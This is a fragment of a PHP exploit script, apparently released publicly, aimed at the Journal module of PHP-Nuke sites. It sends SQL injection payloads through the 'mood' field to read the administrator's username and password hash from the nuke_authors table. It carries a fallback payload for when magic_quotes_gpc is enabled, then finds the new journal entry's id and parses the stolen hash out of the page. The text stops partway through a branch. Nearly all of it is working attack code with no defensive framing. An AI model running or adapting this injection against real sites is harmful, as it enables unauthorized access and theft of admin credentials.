$http->postdata="title=wow\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
//This part of the exploit is a bit strange sorry for the mess, gotta realease!
if(strstr($response,"javascript:history.go(-1)")){
//magic_quotes_gpc=on
$http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
if(strpos($response,"31337")){
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}else{
//magic_quotes_gpc=off
sleep(3);